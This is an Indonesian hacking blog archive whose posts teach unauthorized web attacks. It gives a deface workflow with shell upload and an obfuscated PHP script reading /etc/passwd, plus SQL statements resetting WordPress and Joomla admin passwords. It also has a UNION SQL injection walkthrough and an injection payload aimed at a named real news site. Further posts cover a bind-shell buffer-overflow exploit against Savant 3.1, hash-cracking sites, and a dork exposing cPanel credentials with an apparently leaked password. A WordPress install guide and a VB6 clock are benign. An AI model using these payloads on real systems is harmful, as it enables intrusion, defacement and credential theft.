PPC Iklan Blogger Indonesia

Kamis, 30 Mei 2013

0 Alur Web Attack ( Tools Hacking )

02.50 Under From Unknown
[0 Comment]
Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting

1. Scan

Cari tau dimana letak kelemahan web target. Bisa di scan pake beberapa tool scanner. Diantar'a yang paling terkenal :

# Acunetix (Windows)
# Nikto (Linux)

Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.


2. XPL/SQLi

Setelah kita dapat menemukan data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Di bawah ini daftar situs yang menyediakan macam-macam Exploit :

# Exploit Database
# Packet Storm
# Inj3ct0r
# Hack0wn

Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang di gunakan web target. Karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhan'a. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.

Kalau teknik SQLi dapat di lihat disini :

Ebook beserta sourc website untuk praktek teknik SQLi donlot disini

3. Upload Shell


Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman admin. Tinggal kita upload shell'a sekarang ;

- Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shell'a.

- Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer

- Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shell'a di rename menjadi shell.php.jpg lalu upload.


Setelah shell berhasil di upload tinggal panggil letak URL shell'a dimana.

4. Deface or Jumping

Kalau pengen gaya-gaya an (Deface), cari file index.php lalu rubah file di dalam'a dengan script Deface yang kita punya. Bagi yang malas bikin scrip deface dapat menggunakan tool ; DefaceMaker. Coba arshive kan website yang sudah kita deface di situs :

- Indonesian Defacer
- Magelang Cyber
- Zona-H


Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Cara'a ?

Script jumping ;

Code:
<?

$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";
($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\ ​ 162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3 ​ d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\ ​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x ​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a ​ *\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154 ​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2 ​ a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\ ​x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs ​ \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076 ​<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";

?>

- Upload script jumping'a
- Rename jadi jumpingfinder.php
- Panggil letak URL file tersebut
- Masuk ke public_html web target
- Masuk ke MySQL'a (cari acount MySQL di file config)
- Cari table user
- Update Password user admin


Dibawah ini ada script khusus untuk update user password admin :

# Wordpress
PHP Code:
UPDATE `note_wrdp1`.`wp_usersSET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1
User : admin
Pass : admin

# Joomla
PHP Code:
update `jos_usersset `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"
User : admin
Pass : devilzc0de

Password admin sudah berhasil di update tinggal ikuti seperti langkah nomor 3.

5. Rooting
Muntah Capek Tidur
Read More »

0 Mencari username dan Password Web ( Seperti Tv one )

02.25 Under From Unknown
[0 Comment]
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .
Read More »

Minggu, 26 Mei 2013

1 Cara Mengetahui Username Dan password Web Melalui Exploit ( Berlaku pada semua Site )

08.16 Under From Unknown
[1 Comment]
ehm:/ oke selamata malam :)
bersama saya raka paksi
akan membagikan tutor Melakukan exploit kepada suatu site
contoh :   http://www.tvonenews.tv/polling_news/hasil.php?topik_id=

Nah maka ketika di id kita memasukan exploit nya berupa

218+UNION+%2F%2A%21SELECT%2A%2F+1%2C2%2Cunhex%28hex%28group_concat%28%2F%2A%21username%2C0x7c%2Cpassword%2A%2F%29%29%29%2C4+from+user--+


Selesai deh.. tinggal Hexa saja code nya lalu login deh :)
Read More »

Jumat, 24 Mei 2013

0 POC Owning Shell From Zero Day Attack

00.12 Under From Unknown
[0 Comment]
Belakangan ini, saya menangkap traffic yang cukup menggiurkan di internet. 78% peretas indonesia ternyata sedang mencari tau konsep exploitasi yang cepat, dan mudah. Tidak ada yang lebih cepat dan mudah dari pada serangan zero day. Tidak seperti SQL injection yang memakan waktu paling cepat 5 menit sebelum peretas akhirnya mendapatkan akses ke dalam situs yang berkaitan. Namun zero day attack hanya membutuhkan waktu kurang dari 10 detik untuk mendapatkan shell.

Kali ini saya akan memberikan prove of concept dari exploit zero day yang saya buat di exploit-db. Dan anda akan melihat betapa cepatnya serangan ini berlangsung. Kali ini target saya adalah windows XP SP2 English. Target saya membuka HTTP port (80), dan menggunakan Savant versi 3.1 sebagai web servernya. Yang akan saya lakukan adalah mengeksploit Savant versi 3.1 dengan sederet script python, yang kemudian akan membuat Savant mengalami buffer overflow.

Exploit saya telah masuk dalam daftar database exploit db. Untuk pengguna backtrack, file ini dapat ditemukan dengan perintah.


Code:
root@red-dragon:~# cd /pentest/exploits/exploitdb/
root@red-dragon:/pentest/exploits/exploitdb# cat files.csv | grep -i savant | grep "red-dragon" | awk -F "," '{print "File located in:", $2, "| The filename is:",  $3, "by", $5}'
File located in: platforms/windows/remote/18401.py | The filename is: "Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)" by red-dragon

Spoiler: hide
[Image: locate_exploit.png]

Ok. Kita sudah mendapatkan file exploit pada /pentest/exploits/exploitdb/platforms/windows/remote/18401.py. Tahap selanjutnya adalah membuat file ini menjadi peluru bagi web server.

1. Konfigurasi Exploit

Untuk mengkonfigurasikan exploit, kita hanya perlu sedikit mengedit file exploit. Di dalam file exploit ini, terdapat bagian pengaturan IP target. Anda harus mengubah ini agar exploit dapat dikirim ke web server yang anda tuju. Sebelumnya, kita harus mengkopi file ini sehingga kita tidak mengubah file asli yang didownload dari exploitdb.

Code:
root@red-dragon:/pentest/exploits/exploitdb# cp platforms/windows/remote/18401.py /tmp/savant.py

Spoiler: hide
[Image: copy_exploit.png]

File ini saya copy ke folder /tmp. Kemudian saya edit di bagian IP address menjadi IP target saya 10.10.1.128.

Code:
root@red-dragon:/tmp# nano savant.py

Spoiler: hide
[Image: edit_exploit.png]

Ok. Setelah file di edit. Sekarang kita ke bagian PoC. Sesuai dengan fungsi file exploit kita, server akan membuka koneksi netcat pada port 4444 setelah exploit buffer overflow dikirim. Saya akan mencoba masuk ke dalam port 4444 sebelum exploit dikirim.

Code:
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) : Connection refused

Spoiler: hide
[Image: closed.png]

Port ini masih tertutup. Kemudian saya kirim file exploit milik saya.

Code:
root@red-dragon:/tmp# python savant.py

Spoiler: hide
[Image: send+exploit.png]

Dan kita cek lagi dengan netcat.

Code:
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Savant>

Spoiler: hide
[Image: owned.png]

Perhatikan screenshoot di atas. Anda dapat melihat seberapa cepat zero day dalam melakukan defacing web dengan mengendalikan shell korban. Jika saya tidak mengambil screenshoot, waktu yang dibutuhkan oleh file exploit ini hanya 10 detik.

OWNED by : red-dragon
Read More »

0 Kenali Tipe Hash Kamu !!!

00.10 Under From Unknown
[0 Comment]
1.MD5(Message-Digest algortihm 5)
=> MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (wikipedia)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b

2.MD5($pass.$salt)
=> digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73

3.MD5($salt.$pass)
=> digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d

4.md5(md5($pass).$salt)
=> digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2

5.MD5(Wordpress)
=> digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf "B") kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah "12345678") lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

6.MD5(phpBB3)
=> digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor "9"), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120

7.SHA-1(Secure Hash Algorithm)
=> diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard
digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab

8.SHA-256(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

9.SHA-512(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...

10.Base64
=> algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan "="
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=

situs untuk mengcrack hash :
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi yang lain,,,
bagi yang mau nambahi silahkan di koment di sini,,, Bigsmile
Read More »

Kamis, 23 Mei 2013

0 [Tutor] simple Install Wordpress di Hosting

02.48 Under From Unknown
[0 Comment]
wah.. lama ga posting di HN. bingung mw post apa..
mungkin kalo liat judulnya. uda pd ngerti kali yah. Garing kan tutor kaya gini di google jg bnyak.
sebenernya simple sih. install WP tuh hampir sma kaya install CMS yg laen nya. sebagian hosting juga uda ngasi fitur auto installer nya.
tp mungkin ada juga yg lumb ngerti. jd.. ga ada salahnya dong kalo ane berbagi sdikit tutor cupu ane ttg install WP di hosting. kmaren juga ada yg nanya ke ane ttg ini.
sebenernya di HN uda ada sih Cara menginstall wordpress di localhost dengan XAMPP. yah sebenernya sama aja sih dg install di hosting.
dan ada lg Install WP on Nginx web Server
yaudah. mulai aja deh.

1. upload wordpress ke hostingnya. yg belom punya bisa di download di http://wordpress.org/download/ terakhir ane download versi 3.4

2. kalo udah di upload. sekarang kita mulai installasinya. kita menuju ke file wordpress yg kita upload td.
=> http://domain/[path]/wp-admin/setup-config.php
*path > direktori tmpat kita upload file2 WP td. jd sesuaiin aja sesuai kedalaman ente ng'uploadnya.
misal >> http://wordpressku.com/wp/wp-admin/setup-config.php || klik Lets go!

Spoiler: hide
[Image: c5e85257.png]

3. lalu muncul form buat kita isi dengan konfigurasi database sesuai settingan di hosting kita. masukin semua informasi yg dibutuhin. kalo udah klik submit.
Spoiler: hide
[Image: f140e934.png]

4. setelah klik submit, lalu muncul bginian. berarti wp kita uda sukses berkomunikasi dg database kita. :) trus klik run the install.
Spoiler: hide
[Image: 785855ed.png]

5. kemudian muncul form lg, isi dengan informasi ttg website kita -> [judul_web;user_admin;pass_admin;email+admin] kalo udah smua, klik Install Wordpress.
Spoiler: hide
[Image: 9995f712.png]

6. Selesai deh. muncul halaman yg mengidentifikasikan kalo kita uda berhasil ng'install wp.
Spoiler: hide
[Image: b6875e1d.png]


coba kita login ke halaman admin wp kita. dan mulai berkreasi.
Spoiler: hide
[Image: 4daa794c.png]

halaman homepage wp kita
Spoiler: hide
[Image: fe36d349.png]

gambang kan?
segitu aja deh.. kan cuma ng'install. kalo lebih advance nya. coba searching2 lg ajah. coz ane kurang ngerti. maklum lah. ane copo abiz. jd tutor2nya jg copo.

mungkin tutor ini berguna buat yg masi belom tau, dan belum kenal google. Bigsmile
Read More »

0 [VB6] JAM Digital Sederhana Super Simple

02.38 Under From Unknown
[0 Comment]
[VB6] JAM Digital Sederhana Super Simple Permisi....
Newbie dari yg Paling Newbie Numpang ngethread Culas
udahlah ngak usah basa basiii ... Langsung saja yok Mafia :

Alat / Bahan :
[Quote]
*PC (Pastinya) wakaka
*Software VB6 (Pastinya)wakaka
1 buah label
1 buah timer

~*~*~*~~*~*~*~*~~*~*~*~*~*~~*~*~*~*~*~*~*~*~*~~*~*~*
Okelah Langsung ke TKP

1. Bikin 1 buah Label dan 1 buah Timer .... Lalu Susun . Contoh:

Spoiler: hide
[Image: clockbyrifaldi2.PNG]

2.Lalu Klik 1x Timer Lalu Ubah Intervalnya Menjadi 100
Spoiler: hide
[Image: clockbyrifaldi3.PNG]

3. Setelah itu Klik 2x Timer lalu Masukan Code ini :
PHP Code:
Private Sub Timer1_Timer()Label1.Caption Time
End Sub 

Lihat Gambar :

Spoiler: hide
[Image: clockbyrifaldi4.PNG]

4. Selesai Cheer . dan tinggal di kreasikan aja jam digital sederhanan yg dibuat ... lalu pencet F5 untuk previewnya.. kalau udah bener tinggal di save

~*~*~*~~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~*~*~*~*~*

Hasil Jadi Punya ane :

Spoiler: hide
[Image: clockbyrifaldi.PNG]

~*~*~*~~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~*~*~*~*~*
Sori kalau TS ane berantakan ... maklum masih newbie ..
Read More »

Sabtu, 18 Mei 2013

0 Mencari Cpnel Dengan bantuan DORK

01.00 Under From Unknown
[0 Comment]
Siang buat Para Maho SBH crew :*
dari pada gua gak ada kerjaan mending post dah Big Grin

Dork : "<?php JConfig public $$offset user = filetype:txt"
NB : tanpa Tanda petik Big Grin

NAH PASTI Muncul Seperti


Nah jika Sudah Silahkan Cari user dan password cpnelnny Big Grin
Contoh yang Saya Dapet Big Grin


Dan kita liat Di situ ada Tulisan
public $user = 'juancarl';
public $password = 'RTb88h44tf';

Kita Cari Dulu Itu User Web mana Big Grin

Biasa nya ada di
public $mailfrom = 'contacto@site.org';

Brarti Webnya site Big Grin
Nah Buat login cpnel nya site.org:2082 Big Grin
jika sudah Masukan User Dan Password yang sudah di ketahui Big Grin

Jika sudah Klian bakal Dapet CPNEL (jika Beruntung :v )
Read More »